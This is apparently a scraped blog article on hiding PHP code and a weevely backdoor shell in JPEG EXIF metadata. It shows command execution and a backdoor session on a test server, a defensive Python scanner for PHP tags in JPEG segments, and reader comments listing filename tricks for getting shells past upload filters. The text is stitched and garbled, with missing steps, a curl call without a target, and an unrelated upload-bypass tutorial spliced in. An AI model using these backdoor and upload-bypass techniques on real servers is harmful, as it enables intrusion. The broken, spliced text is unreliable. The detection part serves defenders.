PHP Code into JPEG Metadata: From hide to unhide

In a previous article I extensively analyzed the information leakage originating from file metadata fields. In this article I will go one step further and show how an attacker can use common EXIF JPEG metadata fields to hide PHP code (or even a whole backdoor shell) in them. After the PoC demonstrating the effectiveness of the hiding technique, I will present some basic scanning mechanisms that can be applied to protect against malicious images with hidden PHP code. To manipulate the EXIF JPEG metadata fields I will use a command line tool, although there are many other tools out there with similar functionality to choose from according to your needs. Now that we have our metadata manipulation tool, let's pick a random JPEG image and read its metadata.
Root@testbed: ~# jhead image.jpg
File name    : image.jpg
File size    : 182007 bytes
File date    : 2011:09:07 21:20:10
Resolution   : 1197 x 478
Comment      :

Root@testbed: ~# curl -d cmd=id
gid=33(www-data) groups=33(www-data)

Bingo!
The command has been successfully executed on the target machine. The garbage at the beginning of the output is caused by the binary data of the image's header, which is sent to the client before the PHP code in the comment field is reached. Something that must be mentioned here is that some PHP configurations might have passthru listed in their disabled_functions.

In that case you can choose a similar function such as system, exec, shell_exec etc. Now that we have confirmed that our technique is working, let's hide a whole PHP backdoor shell in the comment field of the same image. For that purpose I will choose the weevely PHP shell, but you can choose an alternative shell from your pentest arsenal. Initially we create the shell with the weevely script and then copy the generated PHP code into the metadata comment field.

Root@testbed: weevely# ./weevely.py -t -p admin -u
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website:
+ Using method 'system()'.
+ Retrieving terminal basic environment variables.
[www-data@webtestbed /var/www/media] ls
image.jpg
[www-data@webtestbed /var/www/media] id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[www-data@webtestbed /var/www/media]

Pwned! We have access to the target machine with the privileges of the Apache user (www-data). OK, now let's move from the dark side to the white side. We need to establish a protection mechanism for files that contain malicious code inside their metadata fields.
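A minimal scanner of this kind, added here as an example (it is not the tool the article goes on to use): it walks the JPEG marker segments up to the start of scan, and searches the free-text segments (COM and APP0 to APP15, APP1 being where EXIF lives) for a PHP open tag. The sample JPEG headers it runs on are constructed inline; they are not the image from the article.

```python
import re
import struct

# PHP open tags: "<?php", the short echo tag "<?=", or "<?" followed by whitespace
PHP_TAG = re.compile(rb"<\?(php\b|=|\s)", re.IGNORECASE)

def jpeg_segments(data):
    """Yield (marker, payload) for each length-prefixed segment before SOS."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xDA:            # SOS: compressed image data follows, stop
            return
        if marker in (0xD8, 0xD9, 0x01) or 0xD0 <= marker <= 0xD7:
            pos += 2                  # standalone markers carry no length field
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length

def find_php_in_metadata(data):
    """Return (segment name, offset, snippet) for every PHP tag in COM/APPn segments."""
    hits = []
    for marker, payload in jpeg_segments(data):
        if marker == 0xFE:
            name = "COM"
        elif 0xE0 <= marker <= 0xEF:
            name = "APP%d" % (marker - 0xE0)   # APP1 is where EXIF lives
        else:
            continue                            # DQT, SOF, DHT etc. are not free text
        for m in PHP_TAG.finditer(payload):
            hits.append((name, m.start(), payload[m.start():m.start() + 40]))
    return hits

def build_jpeg(segments):
    """Assemble a minimal JPEG header from (marker, payload) pairs (test input only)."""
    out = b"\xff\xd8"
    for marker, payload in segments:
        out += b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload
    return out + b"\xff\xda\x00\x02\xff\xd9"   # empty SOS then EOI

JFIF = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
# Constructed samples: a clean header, and one with a PHP tag hidden in the COM field
CLEAN = build_jpeg([(0xE0, JFIF)])
TAINTED = build_jpeg([(0xE0, JFIF), (0xFE, b"Nice photo <?php echo 'hidden'; ?>")])
```

A hit in a metadata segment is only harmful if the web server is configured to hand .jpg files to the PHP interpreter, so a scan of the image directory should go together with a check of the .htaccess and handler configuration under the web root.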
Lately I have extensively used the scanner, so I decided to give it a try with the malicious images. Let's scan the whole www directory and see what the report says.

Anestisb, February 15th, 2013 at 15:26
@hmmm The article was written as a reference example of a specific technique that can be used to execute server side code stored in EXIF metadata. It does not provide a fully applicable exploitation path. The entry point for the .htaccess edit and/or creation may vary from setup to setup and might not be possible under certain scenarios. The .htaccess manipulation is out of scope for this article, although some common entry points include: misconfigured FTP access to www paths, misconfigured plugins/addons of frameworks that handle .htaccess files, insecure cpanels etc.

February 10th, 2014 at 03:15
Upload this as a .swf, and on plugins you can also try to put a backshell encoded gzinflate script, if you'd really like to do the thinking like the code above. The vulnerability which we are about to demonstrate is in my opinion the number 1 reason why websites are hacked and exploited further to the server level. When a hacker performs a SQL injection attack on a website he needs a way to get shell level access and install the PHP backdoor so he can touch other files on the server, or compromise the server itself if it's vulnerable.
If we could secure our uploads and restrict our upload area so that it does not allow the upload of files other than images, we could protect our upload area. However, there is a problem: PHP files can still be uploaded by various methods. The most common method is renaming the PHP backdoor to one of the following and then uploading the shell.

Shell.php.jpg shell.php.jpg shell.php.jpg shell.php.jpg shell.php.jpg:; shell.php.jpg%; shell.php.jpg; shell.php.jpg; shell.php.jpg:;

However, there is also a method to block the upload of the above files. But there is also another way to bypass it, even if uploading files with the above names is blocked. We will use Tamper Data for this purpose.